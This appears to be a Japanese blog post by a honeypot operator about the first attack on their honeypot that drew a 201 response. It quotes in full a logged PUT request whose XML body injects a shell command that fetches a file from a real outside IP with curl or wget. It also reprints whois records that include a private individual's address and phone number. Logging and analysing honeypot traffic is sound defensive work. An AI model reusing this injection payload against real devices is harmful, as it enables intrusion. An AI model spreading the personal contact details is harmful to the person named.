初めての201リクエストが来たから調べたらやばいところからだった

ハニーポットを構築してからほとんどがGETリクエストでとりあえずつつく攻撃でしたので200レスポンスかログインアクセスをしてくるレスポンスとして401がほとんどでした。

本日のログに初めて201レスポンスを返す攻撃が来ました。

HTTPリクエストに関しては下記リンクを参考にすると良いと思います。

201レスポンスのコードはこちら。

[2022-02-24 05:14:20+0900] 104.236.150.159 "PUT /SDK/webLanguage HTTP/1.1"

PUTでファイルを置きに来てる感がありますね。

PUT /SDK/webLanguage HTTP/1.1

User-Agent: curl/7.58.0

Accept: */*

Connection: keep-alive

X-Requested-With: XMLHttpRequest

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Accept-Language: en-US,en;q=0.9,sv;q=0.8

Content-Length: 108

<?xml version="1.0" encoding="UTF-8"?><language>$(curl 45.94.156.22/hik || wget 45.94.156.22/hik)</language>

USと書いてありますが、ipアドレスにcurlコマンドとwgetで何かダウンロードしようとしています。
ipアドレスを調べてみた結果は以下になります。

inetnum: 45.94.156.0 - 45.94.156.255
netname: UA-HOSTIQ country: UA　　　→　（ウクライナ）
admin-c: SN7141-RIPE
tech-c: SN7141-RIPE
tech-c: AR22074-RIPE
status: ASSIGNED PA
mnt-by: HOSTIQ-MNT
created: 2019-08-07T11:08:10Z
last-modified: 2019-08-07T11:08:10Z
source: RIPE

role: Abuse-C Role nic-hdl: AR22074-RIPE
org: ORG-PSMV2-RIPE
abuse-mailbox: abuse@vps.ua
mnt-by: VPSUA-MNT
address: 61015, Ukraine, Kharkiv, Donbasivskiy alley, 17, of. 59
created: 2014-08-14T13:49:57Z
last-modified: 2017-05-22T14:39:17Z
source: RIPE # Filtered

person: Skurikhin Nikolay
address: 61015, Kharkiv, Donbassovsky lane, 17, apartment 59
phone: +380503235698
nic-hdl: SN7141-RIPE
mnt-by: HOSTIQ-MNT
created: 2019-06-06T10:57:06Z
last-modified: 2019-06-06T10:57:06Z
source: RIPE